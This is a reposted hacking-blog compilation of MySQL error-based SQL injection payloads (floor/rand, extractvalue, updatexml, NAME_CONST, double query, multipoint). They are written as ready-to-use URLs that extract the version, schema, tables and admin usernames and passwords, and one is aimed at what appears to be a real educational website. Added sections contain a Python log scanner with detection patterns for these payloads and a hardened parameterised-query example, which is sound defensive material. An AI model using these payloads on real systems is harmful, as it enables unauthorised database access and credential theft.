• A compilation of MySQL error-based injection methods


    1. Forcing an error through floor()

    /*database version*/

    SQL
    http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

    /*connected user*/

    SQL
    http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

    /*current database*/

    SQL
    http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

    /*dump database names*/

    SQL
    http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

    /*dump table names*/

    SQL
    http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

    /*dump column names*/

    SQL
    http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x61646D696E LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

    /*dump row contents*/

    SQL
    http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

    2. ExtractValue (length-limited: at most 32 characters)

    SQL
    http://www.hackblog.cn/sql.php?id=1 and extractvalue(1, concat(0x7e, (select @@version),0x7e))
    http://www.hackblog.cn/sql.php?id=1 and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)))

    3. UpdateXml (length-limited: at most 32 characters)

    SQL
    http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)
    http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1),0x7e),1)

    4. NAME_CONST (works on older versions)

    SQL
    http://wlkc.zjtie.edu.cn/qcwh/content/detail.php?id=330&sid=19&cid=261 and 1=(select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)--

    5. Error based Double Query Injection (http://www.vaibs.in/error-based-double-query-injection/)

    /*database version*/

    SQL
    http://www.hackblog.cn/sql.php?id=1 or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1

    6. Multipoint (newer method)

    /*database version*/

    SQL
    http://www.hackblog.cn/sql.php?id=1 and 1=(select multipoint((select * from(select * from(select version())f)x)))
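Each family above leaves a distinct fingerprint in the request itself, so a defender can flag them in web-server access logs without waiting for database error output. The following Python is an added example written for this page (it is not from the original post): it percent-decodes each request URI until the decoding is stable, strips inline /**/ comments, reports which of the six techniques the URI matches, and applies one generic control that needs no function name at all, namely that the numeric id parameter must stay numeric. The log lines are constructed, the path /sql.php mirrors the post's example endpoint, and the client addresses are documentation-range placeholders.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qs

# Constructed sample access-log lines (Apache combined-style prefix); not from
# the original post. The request URIs reuse the payload families listed above
# in URL-encoded form, plus two benign requests as negative controls.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2020:13:55:36 +0000] "GET /sql.php?id=1 HTTP/1.1" 200 512
203.0.113.5 - - [10/Oct/2020:13:55:40 +0000] "GET /sql.php?id=1%20and(select%201%20from(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 233
203.0.113.5 - - [10/Oct/2020:13:55:44 +0000] "GET /sql.php?id=1%20and%20extractvalue(1,%20concat(0x7e,(select%20@@version),0x7e)) HTTP/1.1" 500 201
203.0.113.5 - - [10/Oct/2020:13:55:48 +0000] "GET /sql.php?id=1%20and%20UpDaTeXmL(1,concat(0x7e,(SELECT%20@@version),0x7e),1) HTTP/1.1" 500 201
203.0.113.5 - - [10/Oct/2020:13:55:52 +0000] "GET /sql.php?id=1%20and%201=(select%20*%20from%20(select%20NAME_CONST(version(),1),NAME_CONST(version(),1))%20as%20x)-- HTTP/1.1" 500 190
203.0.113.5 - - [10/Oct/2020:13:55:56 +0000] "GET /sql.php?id=1%20and%201=(select%20multipoint((select%20*%20from(select%20*%20from(select%20version())f)x))) HTTP/1.1" 500 190
198.51.100.7 - - [10/Oct/2020:13:56:01 +0000] "GET /search.php?q=floor%20plans HTTP/1.1" 200 4096
"""

# One log line: client IP, method, request URI and HTTP status code.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(GET|POST) (\S+) HTTP/[^"]+" (\d{3})')

# Function names that only serve to leak data through an error message;
# none of them belongs in a legitimate "id" parameter.
FUNC_SIGS = {
    "extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    "updatexml":    re.compile(r"\bupdatexml\s*\(", re.I),
    "name_const":   re.compile(r"\bname_const\s*\(", re.I),
    "multipoint":   re.compile(r"\bmultipoint\s*\(\s*\(?\s*select\b", re.I),
}
# The floor() technique needs both pieces: rand() fed into floor(), and a
# GROUP BY, in either order (covers the plain and the "double query" variant).
FLOOR_RAND = re.compile(r"\bfloor\s*\(\s*rand\s*\(", re.I)
GROUP_BY = re.compile(r"\bgroup\s+by\b", re.I)
COMMENT = re.compile(r"/\*.*?\*/", re.S)


def normalize(uri: str) -> str:
    """Percent-decode until stable (catches double encoding) and replace
    inline /**/ comments, a common whitespace substitute, with a space."""
    prev = None
    while prev != uri:
        prev, uri = uri, unquote(uri)
    return COMMENT.sub(" ", uri)


def classify(uri: str) -> list:
    """Return the error-based injection indicators found in one request URI."""
    text = normalize(uri)
    hits = []
    if FLOOR_RAND.search(text) and GROUP_BY.search(text):
        hits.append("floor_rand_groupby")
    for name, pattern in FUNC_SIGS.items():
        if pattern.search(text):
            hits.append(name)
    # Generic control independent of any function name: this endpoint's "id"
    # is an integer by contract, so anything else deserves a look.
    params = parse_qs(urlsplit(text).query)
    if any(not v.isdigit() for v in params.get("id", [])):
        hits.append("non_numeric_id")
    return hits


def scan_log(text: str) -> list:
    """Parse each log line and keep those carrying at least one indicator."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _method, uri, status = m.groups()
        indicators = classify(uri)
        if indicators:
            findings.append({"ip": ip, "uri": uri, "status": int(status),
                             "indicators": indicators})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["status"], ",".join(f["indicators"]), f["uri"][:60])
```

The floor() signature deliberately requires both floor(rand(...)) and a GROUP BY, which is what separates the technique in sections 1 and 5 from ordinary text that merely contains the word floor (the search.php control line). Matching on the decoded URI matters: a single extra layer of percent-encoding is enough to hide every one of these names from a naive substring match on the raw log line. The non_numeric_id indicator is the one most worth keeping even after the function-name list goes stale, because all six methods start by turning the integer id into an expression.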

    Swap in the keywords for whatever you want to query.
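All six methods depend on the same two application defects: the id parameter is pasted into the SQL text, and the database's error message is shown to the client. The following Python, an added example that is not part of the original post, puts that unsafe string-building pattern beside a hardened lookup that validates the parameter's type, binds the value as a query parameter, and returns a generic error while keeping the database detail in the server-side log. It uses SQLite's in-memory database with a constructed posts table as a stand-in for the MySQL database behind sql.php; the exact error text therefore differs from MySQL's, but the two code paths are the same.

```python
import logging
import sqlite3

log = logging.getLogger("sql_demo")


def setup_db() -> sqlite3.Connection:
    """In-memory table standing in for the MySQL table behind sql.php (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO posts VALUES (?, ?)",
                     [(1, "first post"), (2, "second post")])
    conn.commit()
    return conn


def build_query_unsafe(user_id: str) -> str:
    """The pattern every payload above relies on: the raw parameter becomes SQL text."""
    return "SELECT id, title FROM posts WHERE id = " + user_id


def run_unsafe(conn: sqlite3.Connection, user_id: str):
    """Executes the concatenated query and, like the vulnerable pages these
    payloads assume, hands the raw database error text back to the caller."""
    try:
        return conn.execute(build_query_unsafe(user_id)).fetchall()
    except sqlite3.Error as exc:
        return str(exc)  # engine name, function names and values leak here


def lookup_post(conn: sqlite3.Connection, user_id: str) -> dict:
    """Hardened lookup: check the type, bind the value, never echo DB errors."""
    # 1. The contract says id is a positive integer; reject everything else
    #    before it gets anywhere near the SQL layer.
    if not user_id.isdigit():
        return {"ok": False, "error": "invalid id"}
    try:
        # 2. The value travels as a bound parameter, so it can never change
        #    the statement's structure no matter what it contains.
        row = conn.execute("SELECT id, title FROM posts WHERE id = ?",
                           (int(user_id),)).fetchone()
    except sqlite3.Error as exc:
        # 3. Detail goes to the server log; the client sees a fixed message.
        log.error("database error for id=%r: %s", user_id, exc)
        return {"ok": False, "error": "request failed"}
    return {"ok": True, "row": row}


if __name__ == "__main__":
    db = setup_db()
    probe = "1 and extractvalue(1,1)"          # shape of the section 2 payload
    print("unsafe  :", run_unsafe(db, probe))   # raw engine error reaches the caller
    print("hardened:", lookup_post(db, probe))  # rejected before any SQL runs
    print("hardened:", lookup_post(db, "1"))
```

Step 1 alone stops every payload on this page for a numeric id, but step 2 is what makes the fix general (string parameters cannot be validated by isdigit), and step 3 is what removes the channel itself: with no database error text in the response, a successful error-based payload has nothing to read back.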

    This article is original content by Hack Blog; when reposting, cite the original link http://www.hackblog.cn/post/36.html
  • Original post: https://www.cnblogs.com/vspiders/p/7400176.html